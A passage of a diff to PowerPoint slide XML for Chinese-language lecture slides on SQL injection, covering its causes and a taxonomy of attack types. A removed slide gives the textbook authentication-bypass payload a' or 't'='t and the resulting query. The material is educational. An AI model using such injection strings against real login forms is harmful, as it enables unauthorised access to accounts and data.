+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>://www.myhack58.com/Article/html/3/7/2014/44097.htm</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2158825017"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8736,166 +11176,106 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>Sql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t> injection </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>产生原因</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
-              <a:t>注入 分类</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>1.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>没有正确过滤</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>转义字符</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>2.Incorrecttype handling </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>3.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>数据库服务器中的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>漏洞</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>4.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>盲目</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>注入式</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>攻击</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="内容占位符 3"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="14"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>5.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>条件响应 </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>6.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>条件性差错 </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>7.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>时间延误</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>在应用程序链接数据库时使用权限过大的账户（例如很多开发人员都喜欢用最高权限的系统管理员账户（如常见的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>root</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>sa</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>等）连接数据库）。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>在数据库中开放了不必要但权力过大的功能（例如在</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Microsoft SQL Server</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>数据库中的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>xp_cmdshell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>延伸预存程序或是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>OLE Automation</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>预存程序等）</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>太过于信任用户所输入的数据，未限制输入的字符数，以及未对用户输入的数据做潜在指令的检查。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -8903,7 +11283,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784275701"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325616746"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8932,7 +11312,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="5" name="标题 4"/>
+          <p:cNvPr id="2" name="标题 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -8942,8 +11322,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="891740" y="236520"/>
-            <a:ext cx="10364452" cy="1605094"/>
+            <a:off x="913774" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -8951,381 +11331,294 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
               <a:t>SQL</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
               <a:t>注入 分类</a:t>
             </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="文本占位符 5"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1660767" y="1957631"/>
-            <a:ext cx="3298976" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
-              <a:t>1.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
-              <a:t>没有正确过滤转义字符</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
-          </a:p>
-          <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="9" name="文本占位符 8"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="15"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="412505" y="2245762"/>
-            <a:ext cx="5795499" cy="4243027"/>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913774" y="1520328"/>
+            <a:ext cx="10363826" cy="4825388"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>在用户的输入没有为转义字符过滤时，就会发生这种形式的注入式攻击，它会被传递给一个</a:t>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Classic </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>SQLI —— </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>典型的</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
               <a:t>SQL</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵</a:t>
-            </a:r>
-            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>下面的这行代码就会演示这种漏洞</a:t>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>1) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>脚本注入式的攻击</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>2) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>恶意用户输入用来影响被执行的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>：</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
+              <a:t>脚本</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Blind or Inference SQL </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>statement </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>:= "SELECT * FROM users WHERE name ='"   </a:t>
+              <a:t>injection —— </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>盲</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>注入 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>/ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>推理注入</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Database management system-specific </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>SQLI ——</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>数据库管理系统的特定</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Compounded </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>SQLI ——</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>复合</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>injection + insufficient </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>authentication </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>—— SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>+</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>不充分认证</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>injection + </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>userName</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>   "';" </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>这种</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>代码的设计目的是将一个特定的用户从其用户表中取出，但是，如果用户名被一个恶意的用户用一种特定的方式伪造，这个语句所执行的操作可能就不仅仅是代码的作者所期望的那样了。例如，将用户名变量</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>即</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>username)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>设置为</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>：</a:t>
-            </a:r>
+              <a:t>DDoS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> attacks —— SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>+</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>DDoS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>攻击</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>' or 't'='t</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，此时原始语句发生了变化： 　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
+              <a:t>	SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>injection + DNS hijacking ——  SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>+DNS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>劫持</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>* FROM users WHERE name = 'a' OR 't'='t'; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>如果</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>这种代码被用于一个认证过程，那么这个例子就能够强迫选择一个合法的用户名，因为赋值</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>'t'='t</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>永远是正确的。 </a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="文本占位符 6"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="quarter" idx="3"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="7286460" y="1957631"/>
-            <a:ext cx="3531161" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
-              <a:t>2.Incorrecttype handling</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="文本占位符 9"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="16"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6779679" y="2245762"/>
-            <a:ext cx="4788031" cy="3956734"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>如果一个用户提供的字段并非一个强类型，或者没有实施类型强制，就会发生这种形式的攻击。当在一个</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>语句中使用一个数字字段时，如果程序员没有检查用户输入的合法性</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>是否为数字型</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>就会发生这种攻击。例如： 　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
+              <a:t>	SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>injection + XSS —— SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>statement </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
